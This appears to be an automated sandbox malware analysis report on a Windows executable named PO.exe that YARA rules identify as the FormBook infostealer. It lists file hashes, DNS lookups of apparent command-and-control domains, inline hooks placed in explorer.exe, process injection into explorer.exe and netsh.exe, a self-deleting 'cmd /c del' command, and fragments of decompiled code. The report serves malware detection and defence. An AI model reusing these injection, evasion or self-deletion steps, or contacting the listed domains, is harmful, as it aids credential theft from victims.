                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):5.014394252916949
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    File name:PO.exe
                                    File size:2490880
                                    MD5:1a278a89f8176f9d38a04f4e58a8c072
                                    SHA1:50beebd33a8b68602632e1ec065cc6e3b70b40ea
                                    SHA256:73a8ac37a0f0c6761800a276b77b0fd34d1cf43830f822ef18ff50dbda934751
                                    SHA512:7c2d439eaae875951c07a5f216448f17b93561e3f6083eee94de7c6241c24ea4da1021c3f12b7986d9edc7ef281d5604d30aae8ce61d90be76d34f3fbfb41291
                                    SSDEEP:24576:GDJXK2pQMdCIUPf20glUlSFDHucLADt25NcJ60f4fj:E6HtX2NpucA+
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..................%.........n.&.. ... &...@.. .......................@&...........@................................

                                    File Icon

                                    Icon Hash:00828e8e8686b000

                                    Static PE Info

                                    General

                                    Entrypoint:0x661c6e
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x5FB6EFFB [Thu Nov 19 22:21:47 2020 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:v4.0.30319
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x261c140x57.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2620000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000x25fc740x25fe00unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .reloc0x2620000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Imports

                                    DLLImport
                                    mscoree.dll_CorExeMain

                                    Network Behavior

                                    Network Port Distribution

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Nov 20, 2020 11:00:06.446355104 CET6015253192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:06.474493980 CET53601528.8.8.8192.168.2.3
                                    Nov 20, 2020 11:00:07.272624016 CET5754453192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:07.299825907 CET53575448.8.8.8192.168.2.3
                                    Nov 20, 2020 11:00:09.618983984 CET5598453192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:09.646159887 CET53559848.8.8.8192.168.2.3
                                    Nov 20, 2020 11:00:10.788634062 CET6418553192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:10.815763950 CET53641858.8.8.8192.168.2.3
                                    Nov 20, 2020 11:00:11.596980095 CET6511053192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:11.624150038 CET53651108.8.8.8192.168.2.3
                                    Nov 20, 2020 11:00:12.485497952 CET5836153192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:12.512454987 CET53583618.8.8.8192.168.2.3
                                    Nov 20, 2020 11:00:14.322824955 CET6349253192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:14.349788904 CET53634928.8.8.8192.168.2.3
                                    Nov 20, 2020 11:00:20.443007946 CET6083153192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:20.470057964 CET53608318.8.8.8192.168.2.3
                                    Nov 20, 2020 11:00:22.127502918 CET6010053192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:22.154567957 CET53601008.8.8.8192.168.2.3
                                    Nov 20, 2020 11:00:25.648582935 CET5319553192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:25.675843000 CET53531958.8.8.8192.168.2.3
                                    Nov 20, 2020 11:00:26.850882053 CET5014153192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:26.878113031 CET53501418.8.8.8192.168.2.3
                                    Nov 20, 2020 11:00:28.221642971 CET5302353192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:28.248595953 CET53530238.8.8.8192.168.2.3
                                    Nov 20, 2020 11:00:29.089920044 CET4956353192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:29.117016077 CET53495638.8.8.8192.168.2.3
                                    Nov 20, 2020 11:00:29.745894909 CET5135253192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:29.772902966 CET53513528.8.8.8192.168.2.3
                                    Nov 20, 2020 11:00:31.008836031 CET5934953192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:31.044528008 CET53593498.8.8.8192.168.2.3
                                    Nov 20, 2020 11:00:32.229650021 CET5708453192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:32.256700993 CET53570848.8.8.8192.168.2.3
                                    Nov 20, 2020 11:00:32.679534912 CET5882353192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:32.716883898 CET53588238.8.8.8192.168.2.3
                                    Nov 20, 2020 11:00:33.041760921 CET5756853192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:33.068943024 CET53575688.8.8.8192.168.2.3
                                    Nov 20, 2020 11:00:37.599292040 CET5054053192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:37.626326084 CET53505408.8.8.8192.168.2.3
                                    Nov 20, 2020 11:00:37.886054993 CET5436653192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:37.913269043 CET53543668.8.8.8192.168.2.3
                                    Nov 20, 2020 11:00:53.379832029 CET5303453192.168.2.38.8.8.8
                                    Nov 20, 2020 11:00:53.406965971 CET53530348.8.8.8192.168.2.3
                                    Nov 20, 2020 11:01:06.848416090 CET5776253192.168.2.38.8.8.8
                                    Nov 20, 2020 11:01:06.896358013 CET53577628.8.8.8192.168.2.3
                                    Nov 20, 2020 11:01:07.781565905 CET5543553192.168.2.38.8.8.8
                                    Nov 20, 2020 11:01:07.840471029 CET53554358.8.8.8192.168.2.3
                                    Nov 20, 2020 11:01:08.251220942 CET5071353192.168.2.38.8.8.8
                                    Nov 20, 2020 11:01:08.286914110 CET53507138.8.8.8192.168.2.3
                                    Nov 20, 2020 11:01:08.575808048 CET5613253192.168.2.38.8.8.8
                                    Nov 20, 2020 11:01:08.611509085 CET53561328.8.8.8192.168.2.3
                                    Nov 20, 2020 11:01:08.945375919 CET5898753192.168.2.38.8.8.8
                                    Nov 20, 2020 11:01:08.981035948 CET53589878.8.8.8192.168.2.3
                                    Nov 20, 2020 11:01:09.396877050 CET5657953192.168.2.38.8.8.8
                                    Nov 20, 2020 11:01:09.434571981 CET53565798.8.8.8192.168.2.3
                                    Nov 20, 2020 11:01:09.708476067 CET6063353192.168.2.38.8.8.8
                                    Nov 20, 2020 11:01:09.735516071 CET53606338.8.8.8192.168.2.3
                                    Nov 20, 2020 11:01:09.859127998 CET6129253192.168.2.38.8.8.8
                                    Nov 20, 2020 11:01:09.894753933 CET53612928.8.8.8192.168.2.3
                                    Nov 20, 2020 11:01:10.490293026 CET6361953192.168.2.38.8.8.8
                                    Nov 20, 2020 11:01:10.525974989 CET53636198.8.8.8192.168.2.3
                                    Nov 20, 2020 11:01:11.119065046 CET6493853192.168.2.38.8.8.8
                                    Nov 20, 2020 11:01:11.146034956 CET53649388.8.8.8192.168.2.3
                                    Nov 20, 2020 11:01:11.605583906 CET6194653192.168.2.38.8.8.8
                                    Nov 20, 2020 11:01:11.641343117 CET53619468.8.8.8192.168.2.3
                                    Nov 20, 2020 11:01:24.849941015 CET6491053192.168.2.38.8.8.8
                                    Nov 20, 2020 11:01:24.887193918 CET53649108.8.8.8192.168.2.3
                                    Nov 20, 2020 11:01:50.388691902 CET5212353192.168.2.38.8.8.8
                                    Nov 20, 2020 11:01:50.415774107 CET53521238.8.8.8192.168.2.3
                                    Nov 20, 2020 11:01:51.969986916 CET5613053192.168.2.38.8.8.8
                                    Nov 20, 2020 11:01:51.997040987 CET53561308.8.8.8192.168.2.3
                                    Nov 20, 2020 11:01:56.846453905 CET5633853192.168.2.38.8.8.8
                                    Nov 20, 2020 11:01:56.901777983 CET53563388.8.8.8192.168.2.3
                                    Nov 20, 2020 11:02:17.057722092 CET5942053192.168.2.38.8.8.8
                                    Nov 20, 2020 11:02:17.100363970 CET53594208.8.8.8192.168.2.3

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Nov 20, 2020 11:01:56.846453905 CET192.168.2.38.8.8.80x2335Standard query (0)www.novavitarealty.comA (IP address)IN (0x0001)
                                    Nov 20, 2020 11:02:17.057722092 CET192.168.2.38.8.8.80x380cStandard query (0)www.flexultralounge.comA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Nov 20, 2020 11:01:56.901777983 CET8.8.8.8192.168.2.30x2335Name error (3)www.novavitarealty.comnonenoneA (IP address)IN (0x0001)
                                    Nov 20, 2020 11:02:17.100363970 CET8.8.8.8192.168.2.30x380cNo error (0)www.flexultralounge.comblooming-guava-cawr4blrtfppsz67r0r2wz0v.herokudns.comCNAME (Canonical name)IN (0x0001)
                                    Nov 20, 2020 11:02:17.100363970 CET8.8.8.8192.168.2.30x380cNo error (0)blooming-guava-cawr4blrtfppsz67r0r2wz0v.herokudns.com34.232.47.250A (IP address)IN (0x0001)
                                    Nov 20, 2020 11:02:17.100363970 CET8.8.8.8192.168.2.30x380cNo error (0)blooming-guava-cawr4blrtfppsz67r0r2wz0v.herokudns.com34.227.164.168A (IP address)IN (0x0001)
                                    Nov 20, 2020 11:02:17.100363970 CET8.8.8.8192.168.2.30x380cNo error (0)blooming-guava-cawr4blrtfppsz67r0r2wz0v.herokudns.com3.209.148.13A (IP address)IN (0x0001)
                                    Nov 20, 2020 11:02:17.100363970 CET8.8.8.8192.168.2.30x380cNo error (0)blooming-guava-cawr4blrtfppsz67r0r2wz0v.herokudns.com3.222.114.249A (IP address)IN (0x0001)
                                    Nov 20, 2020 11:02:17.100363970 CET8.8.8.8192.168.2.30x380cNo error (0)blooming-guava-cawr4blrtfppsz67r0r2wz0v.herokudns.com54.164.152.149A (IP address)IN (0x0001)
                                    Nov 20, 2020 11:02:17.100363970 CET8.8.8.8192.168.2.30x380cNo error (0)blooming-guava-cawr4blrtfppsz67r0r2wz0v.herokudns.com3.90.94.177A (IP address)IN (0x0001)
                                    Nov 20, 2020 11:02:17.100363970 CET8.8.8.8192.168.2.30x380cNo error (0)blooming-guava-cawr4blrtfppsz67r0r2wz0v.herokudns.com3.213.190.117A (IP address)IN (0x0001)
                                    Nov 20, 2020 11:02:17.100363970 CET8.8.8.8192.168.2.30x380cNo error (0)blooming-guava-cawr4blrtfppsz67r0r2wz0v.herokudns.com35.170.115.131A (IP address)IN (0x0001)

                                    Code Manipulations

                                    User Modules

                                    Hook Summary

                                    Function NameHook TypeActive in Processes
                                    PeekMessageAINLINEexplorer.exe
                                    PeekMessageWINLINEexplorer.exe
                                    GetMessageWINLINEexplorer.exe
                                    GetMessageAINLINEexplorer.exe

                                    Processes

                                    Process: explorer.exe, Module: user32.dll
                                    Function NameHook TypeNew Data
                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x80 0x0E 0xE7
                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x88 0x8E 0xE7
                                    GetMessageWINLINE0x48 0x8B 0xB8 0x88 0x8E 0xE7
                                    GetMessageAINLINE0x48 0x8B 0xB8 0x80 0x0E 0xE7

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    Analysis Process: PO.exe PID: 3064 Parent PID: 5736

                                    General

                                    Start time:11:00:10
                                    Start date:20/11/2020
                                    Path:C:\Users\user\Desktop\PO.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\PO.exe'
                                    Imagebase:0xe30000
                                    File size:2490880 bytes
                                    MD5 hash:1A278A89F8176F9D38A04F4E58A8C072
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Reputation:low

                                    Chronological Activities

                                    Analysis Process: PO.exe PID: 5820 Parent PID: 3064

                                    General

                                    Start time:11:00:32
                                    Start date:20/11/2020
                                    Path:C:\Users\user\Desktop\PO.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\PO.exe
                                    Imagebase:0x670000
                                    File size:2490880 bytes
                                    MD5 hash:1A278A89F8176F9D38A04F4E58A8C072
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.314545610.0000000001580000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.314545610.0000000001580000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.314545610.0000000001580000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.314657268.00000000015B0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.314657268.00000000015B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.314657268.00000000015B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Chronological Activities

                                    Analysis Process: WerFault.exe PID: 4456 Parent PID: 3064

                                    General

                                    Start time:11:00:34
                                    Start date:20/11/2020
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3064 -s 1204
                                    Imagebase:0xee0000
                                    File size:434592 bytes
                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: explorer.exe PID: 3388 Parent PID: 5820

                                    General

                                    Start time:11:00:35
                                    Start date:20/11/2020
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:
                                    Imagebase:0x7ff714890000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: netsh.exe PID: 6964 Parent PID: 3388

                                    General

                                    Start time:11:00:52
                                    Start date:20/11/2020
                                    Path:C:\Windows\SysWOW64\netsh.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\netsh.exe
                                    Imagebase:0xd90000
                                    File size:82944 bytes
                                    MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.484649434.00000000031B0000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.484649434.00000000031B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.484649434.00000000031B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.483269971.0000000002E50000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.483269971.0000000002E50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.483269971.0000000002E50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: cmd.exe PID: 7052 Parent PID: 6964

                                    General

                                    Start time:11:00:56
                                    Start date:20/11/2020
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del 'C:\Users\user\Desktop\PO.exe'
                                    Imagebase:0xbd0000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: conhost.exe PID: 7060 Parent PID: 7052

                                    General

                                    Start time:11:00:56
                                    Start date:20/11/2020
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6b2800000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Disassembly

                                    Code Analysis

                                    Reset < >

                                      Analysis Process: PO.exe PID: 5820 Parent PID: 3064 PO.exeCOMMON

                                      Executed Functions

                                      Function 00419FDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: BMA$BMA
                                      • API String ID: 2738559852-2163208940
                                      • Opcode ID: 25d73686cc81fee3f40f9f8c309eb2304ac6ac5d820fc6179d45079f64317369
                                      • Instruction ID: 392bd52f96f23ef7119d5a1fc0e5db70b9c2ef6d728fac7ffb12d3523d24c2b6
                                      • Opcode Fuzzy Hash: 25d73686cc81fee3f40f9f8c309eb2304ac6ac5d820fc6179d45079f64317369
                                      • Instruction Fuzzy Hash: E6F0FFB2200104AFCB14CF99DC95EEB77A9EF8C354F158248BE0DD7245DA30E811CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419FE0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E00419FE0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AB30(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                      0x00419fe3
                                      0x00419fef
                                      0x00419ff7
                                      0x0041a002
                                      0x0041a01d
                                      0x0041a025
                                      0x0041a029

                                      APIs
                                      • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: BMA$BMA
                                      • API String ID: 2738559852-2163208940
                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction ID: 370e936de0c6b30a0e9c68c176e8d16dab5dfb862c4be705976860dd555c5517
                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction Fuzzy Hash: DCF0A4B2210208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A10A, Relevance: 1.6, APIs: 1, Instructions: 74memorynativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 16%
                                      			E0041A10A(intOrPtr* __eax, void* __ebx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				void* _t23;
				void* _t28;
				long _t33;
				void* _t35;
				void* _t36;
				void* _t49;
				void* _t50;
				intOrPtr* _t51;
				intOrPtr* _t53;
				void* _t57;

				_t35 = __ebx -  *__eax;
				if(_t35 > 0) {
					_pop(_t50);
					if(__eflags <= 0) {
						_t10 = _t35 + 0x458b1c55;
						 *_t10 =  *((intOrPtr*)(_t35 + 0x458b1c55)) + _t36;
						__eflags =  *_t10;
						asm("sbb [ebx-0x3b7cebb3], cl");
						asm("adc al, 0x52");
						_t23 =  *((intOrPtr*)( *_t51))(_a12, _a16, _t36, __eax); // executed
						return _t23;
					} else {
						_t24 = _a8;
						_t16 = _t24 + 0xc68; // 0x10c68
						_t53 = _t16;
						E0041AB30(_t50, _a8, _t53,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x32);
						_t28 =  *((intOrPtr*)( *_t53))(_a12, _a16, _a20, _a24, _t51, _t57); // executed
						return _t28;
					}
				} else {
					asm("outsd");
					asm("adc byte [ebp-0x75], 0xec");
					_push(_t57);
					_t29 = _a4;
					_push(_t51);
					_t3 = _t29 + 0xc60; // 0xca0
					E0041AB30(_t49, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
					_t33 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
					return _t33;
				}
			}













                                      0x0041a10a
                                      0x0041a10c
                                      0x0041a18d
                                      0x0041a18e
                                      0x0041a16b
                                      0x0041a16b
                                      0x0041a16b
                                      0x0041a171
                                      0x0041a177
                                      0x0041a185
                                      0x0041a189
                                      0x0041a190
                                      0x0041a193
                                      0x0041a19f
                                      0x0041a19f
                                      0x0041a1a7
                                      0x0041a1c1
                                      0x0041a1c5
                                      0x0041a1c5
                                      0x0041a10e
                                      0x0041a10e
                                      0x0041a10f
                                      0x0041a110
                                      0x0041a113
                                      0x0041a119
                                      0x0041a11f
                                      0x0041a127
                                      0x0041a149
                                      0x0041a14d
                                      0x0041a14d

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD04,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A149
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: 9c3a9ba288e076269b8dcb3b0afc6dea0cad4e5461be4f2b4699547b8e6e232f
                                      • Instruction ID: 1417eff0a84993965817e29653ef2a322ced75dff56e9c36daf394e22c6d7801
                                      • Opcode Fuzzy Hash: 9c3a9ba288e076269b8dcb3b0afc6dea0cad4e5461be4f2b4699547b8e6e232f
